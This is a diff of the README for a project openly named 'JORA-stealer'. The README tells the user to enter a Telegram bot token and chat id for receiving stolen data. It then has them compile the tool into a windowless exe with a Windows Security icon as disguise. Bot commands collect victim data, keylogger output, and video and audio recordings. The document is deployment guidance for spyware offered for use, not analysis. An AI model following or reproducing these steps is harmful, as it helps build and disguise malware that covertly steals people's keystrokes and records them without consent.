virus242/JORA-stealer/README.md

 You need to pull the project fromthe repository.

-Fill in the details of your telegram (TOKEN bot and your chat id)
+Fill in the details of your telegram (TOKEN bot and your chat id) in main.py.

 Install all libraries from requirements.txt , start the virtual environment and run the command

 pyinstaller --onefile -w --icon=img\windows-security-new.png main.py

-which is located in the command to create file exe.txt.
+which is located in the "command to create file exe.txt".

 The result is an exe file ready to work.
+Which is located in the "dist" directory

-When you enter / start vs collect the data you need
+When you enter / start collect the data you need

 When entering /screenshot we take the result of the keylogger, recording video and audio
 ---